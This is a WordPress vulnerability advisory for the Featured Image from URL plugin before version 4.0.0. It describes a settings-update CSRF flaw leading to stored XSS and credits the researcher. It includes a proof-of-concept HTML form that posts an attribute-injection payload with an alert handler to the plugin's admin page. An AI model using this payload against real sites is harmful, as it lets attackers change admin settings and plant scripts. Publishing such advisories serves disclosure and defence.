WordPress Plugin Vulnerabilities
Featured Image from URL < 4.0.0 - Arbitrary Settings Update to Stored XSS via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack. Furthermore, due to the lack of validation, sanitisation and escaping in some of them, it could also lead to Stored XSS issues
Proof of Concept
<form action="https://example.com/wp-admin/admin.php?page=featured-image-from-url" method="POST"> <input type="hidden" name="fifu_input_photon" value='on" style=animation-name:rotation onanimationstart=alert(/XSS/)//'/> <input type="submit" value="Submit request" /> </form> All settings appear to be affected. The XSS will be triggered when accessing the settings again
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Raad Haddad of Cloudyrion GmbH
Submitter
Raad Haddad of Cloudyrion GmbH
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-07-11 (about 1 years ago)
Added
2022-07-11 (about 1 years ago)
Last Updated
2023-04-11 (about 1 years ago)